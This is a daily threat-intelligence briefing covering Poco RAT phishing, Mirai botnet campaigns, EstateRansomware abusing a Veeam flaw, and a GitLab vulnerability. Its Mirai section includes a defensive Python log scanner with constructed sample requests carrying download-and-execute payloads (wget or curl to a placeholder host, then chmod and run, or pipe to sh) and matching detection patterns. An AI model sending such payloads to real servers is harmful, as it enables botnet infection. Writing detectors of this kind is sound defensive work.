
Cyware Daily Threat Intelligence


Daily Threat Briefing Jul 11, 2024

A nefarious phishing campaign has unleashed the new Poco RAT malware, wreaking havoc across mining, manufacturing, hospitality, and utility sectors. The Delphi-coded malware underscores a keen focus on Latin American territories.

Enter EstateRansomware, an emergent ransomware menace capitalizing on a long-patched Veeam vulnerability. By exploiting the Veeam flaw, the attackers siphon user credentials and gain backdoor access.

Meanwhile, the Mirai botnet’s relentless evolution perpetuates cybersecurity nightmares. Recent offensives exploit myriad web vulnerabilities, targeting over 1,200 websites.

Top Malware Reported in the Last 24 Hours

New Poco RAT emerges

A phishing campaign targeting Spanish-speaking victims is delivering a new malware called Poco RAT, primarily affecting the mining, manufacturing, hospitality, and utility sectors. Threat actors are using finance-themed lures in phishing messages, HTML or PDF attachments, and Google Drive links to propagate Poco RAT, bypassing secure email gateways. The use of Delphi-based malware and geolocation restrictions on the command-and-control server indicates a focus on Latin America, while similar social engineering campaigns and data theft attacks are also on the rise.

New Mirai botnets spotted

The Mirai botnet continues to evolve and pose significant cybersecurity threats, with recent campaigns exploiting known web vulnerabilities to target over 1,200 sites. Imperva Threat Research has identified over 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, used in these attacks. The malware is typically delivered by exploiting known web vulnerabilities to execute shell commands that download and execute second-stage binaries.
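The delivery chain described above (a web exploit whose payload is a shell command that fetches and runs a second-stage binary) leaves a recognisable trace in web server access logs. The following is an added example, not code from Imperva or from this briefing: it scans combined-format access-log lines for request targets that contain both a downloader command and an execution step. The log lines are constructed for the example using documentation IP ranges; the indicator names and the two-part scoring rule are this example's own assumptions, not a published signature.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache/Nginx combined-log style).
# Illustrative only: hosts, paths and addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jul/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Jul/2024:10:01:07 +0000] "GET /cgi-bin/status?cmd=cd%20/tmp;wget%20http://198.51.100.7/bins/arm7;chmod%20777%20arm7;./arm7 HTTP/1.1" 200 12 "-" "Hello, world"
203.0.113.9 - - [11/Jul/2024:10:01:09 +0000] "POST /api/setup HTTP/1.1" 200 44 "-" "curl/7.64"
198.51.100.22 - - [11/Jul/2024:10:02:15 +0000] "GET /shell?curl%20-s%20http://198.51.100.7/x.sh%7Csh HTTP/1.1" 404 0 "-" "python-requests/2.31"
203.0.113.5 - - [11/Jul/2024:10:03:00 +0000] "GET /assets/wget-logo.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Downloader tokens must appear as a command word followed by whitespace, so
# a file name such as "wget-logo.png" does not match.
DOWNLOADERS = {
    "wget": re.compile(r'(?<![\w-])wget\s+'),
    "curl": re.compile(r'(?<![\w-])curl\s+'),
    "tftp": re.compile(r'(?<![\w-])tftp\s+'),
}
# Execution tokens: the fetched file is made executable, run from the
# current directory, or piped straight into a shell.
EXECUTION = {
    "chmod": re.compile(r'(?<![\w-])chmod\s+'),
    "pipe-to-shell": re.compile(r'\|\s*(?:ba|da)?sh\b'),
    "run-in-cwd": re.compile(r';\s*\./'),
    "sh -c": re.compile(r'(?<![\w-])(?:ba)?sh\s+-c\b'),
}


def indicators_for(target: str) -> List[str]:
    """Return the indicator names found in a request target, or [] if the
    target does not show a complete download-and-execute chain."""
    decoded = unquote_plus(target)
    # Decode a second time: double URL-encoding is a common way to slip
    # past naive string filters.
    decoded = unquote_plus(decoded)
    found_dl = [name for name, rx in DOWNLOADERS.items() if rx.search(decoded)]
    found_ex = [name for name, rx in EXECUTION.items() if rx.search(decoded)]
    # Require both halves of the chain; a lone "curl" keeps false positives down.
    if found_dl and found_ex:
        return found_dl + found_ex
    return []


def is_suspicious(target: str) -> bool:
    return bool(indicators_for(target))


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each log line and report requests carrying a download-and-execute chain."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        inds = indicators_for(m.group("target"))
        if inds:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": unquote_plus(m.group("target")),
                "indicators": inds,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} -> {hit['indicators']}: {hit['target']}")
```

Note that the 404 in the fourth sample line still produces a hit: the request failed on this host, but the same payload is typically sprayed across many targets, so a failed attempt is worth recording and correlating with successful ones elsewhere.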

Top Vulnerabilities Reported in the Last 24 Hours

New ransomware group abuses Veeam bug

A new ransomware group called EstateRansomware is exploiting a Veeam vulnerability (CVE-2023-27532) that was patched over a year ago to deploy file-encrypting malware and extort payments. The gang gains initial access through brute-force attacks on FortiGate firewall SSL VPN appliances. They then establish RDP connections and deploy a backdoor to ensure persistent access. The attackers exploit the Veeam vulnerability to steal user credentials and deploy the ransomware. Veeam had warned about this vulnerability and released a patch in March 2023. It's crucial for users to install software updates to avoid falling victim to malware.

Critical vulnerability in GitLab product

GitLab has identified a critical vulnerability in its Community and Enterprise editions, allowing attackers to run pipeline jobs as any user. The flaw, tracked as CVE-2024-6385, affects versions 15.8 to 17.1.2. GitLab has released updates to address the issue and urges immediate installation. This is the latest in a series of vulnerabilities, with previous flaws enabling account takeover and zero-click attacks.
